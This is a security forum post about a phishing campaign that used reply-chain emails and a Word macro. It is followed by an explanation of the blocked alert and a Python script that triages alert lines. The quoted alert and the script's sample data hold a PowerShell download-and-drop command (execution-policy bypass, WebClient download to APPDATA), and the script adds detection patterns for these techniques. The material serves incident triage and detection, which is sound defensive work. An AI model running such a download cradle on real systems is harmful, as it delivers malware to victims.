We have gotten AE alerts before. Usually harmless. However, this morning multiple malicious emails came into the organization, all from the same sender, and 2 users opened the attachment (Word doc). I received the alert below:
8/31/2017 7:00:09 AM Computer18 10.10.1.125 Exploit payload process blocked BLOCK C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http:\*******************.com\okas\kunkd.dat', $env:APPDATA + '\pP...
Computer name and URL changed.
It looks like the Word doc likely had a macro that triggered this, but here is the weird thing (and maybe it isn't weird and I just haven't seen it yet). The users here who received emails all received a different email (with the bad file attached) that was a reply to a previous email conversation. I've not seen that before. The body of each email was the same but was phrased in a way that fooled multiple users, due to language that is pretty spot on for our industry.
Can anyone tell me what this is that was blocked, and if the particular detail of the email being a reply to a previous email is new?
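The blocked command line in the alert is a PowerShell download cradle: `-nop` skips the user profile, `-Exec Bypass` turns off the execution policy, and `(New-Object System.Net.WebClient).DownloadFile(...)` fetches a second-stage file from a remote host and writes it under `$env:APPDATA`, which is exactly what a macro-launched stager does before the real payload runs. The script below is an added triage example, not part of the original post or of the AE product, that parses alert lines in the same shape as the one quoted above and scores the PowerShell command line for those indicators. The sample alert lines, hostnames, IPs and the URL are constructed placeholders; the field layout is assumed to match the quoted line (timestamp, host, IP, event text, action, image, command line).

```python
import re
from dataclasses import dataclass, field

# Constructed sample alerts in the same field order as the line quoted in the post.
# Hosts, IPs, URL and drop filename are placeholders, not values from the real alert.
SAMPLE_ALERTS = [
    "8/31/2017 7:00:09 AM Computer18 10.10.1.125 Exploit payload process blocked BLOCK "
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -Exec Bypass -Command "
    "(New-Object System.Net.WebClient).DownloadFile('http://example.invalid/okas/kunkd.dat', "
    "$env:APPDATA + '\\payload_placeholder.exe')",
    # A benign-looking admin script launch, for contrast (constructed).
    "8/31/2017 7:05:12 AM Computer04 10.10.1.44 Process started ALLOW "
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File C:\\Scripts\\inventory.ps1",
]

# Indicators worth weighting on a PowerShell command line that an Office process spawned.
# Each pattern is case-insensitive because PowerShell switches are.
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "download_cradle": re.compile(r"System\.Net\.WebClient\)\.Download(?:File|String)", re.I),
    "drops_to_appdata": re.compile(r"\$env:APPDATA", re.I),
    # Accept both http:// and the backslash form (http:\\) seen in the quoted alert.
    "remote_url": re.compile(r"https?:[\\/]{2}", re.I),
}

# Timestamp, host, IP, free-text event, action, image path, then the rest is the command line.
ALERT_RE = re.compile(
    r"^(?P<ts>\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}:\d{2} [AP]M) "
    r"(?P<host>\S+) (?P<ip>\S+) .*?(?P<action>BLOCK|ALLOW) "
    r"(?P<image>\S+\.exe) (?P<cmdline>.*)$"
)


@dataclass
class Verdict:
    host: str
    action: str
    indicators: list = field(default_factory=list)
    suspicious: bool = False


def analyze(line: str):
    """Parse one alert line and score its command line; None if the line does not parse."""
    m = ALERT_RE.match(line)
    if not m:
        return None
    cmdline = m.group("cmdline")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    # Two or more independent indicators on one command line is the threshold used here.
    return Verdict(m.group("host"), m.group("action"), hits, len(hits) >= 2)


def extract_url(text: str):
    """Pull the first remote URL out of a command line so it can be blocked or hunted for."""
    m = re.search(r"https?:[\\/]{2}[^'\"\s]+", text)
    return m.group(0) if m else None


def triage(lines):
    """Return verdicts for every parseable alert line, in input order."""
    return [v for v in map(analyze, lines) if v is not None]


if __name__ == "__main__":
    for v in triage(SAMPLE_ALERTS):
        print(v.host, v.action, "SUSPICIOUS" if v.suspicious else "ok", v.indicators)
```

Even though the product reported the process as blocked, the second user's machine and the original email thread are still worth checking: the extracted URL and drop path are the artefacts to search mailbox and endpoint logs for, and any host that shows the same command line with an ALLOW action needs a closer look.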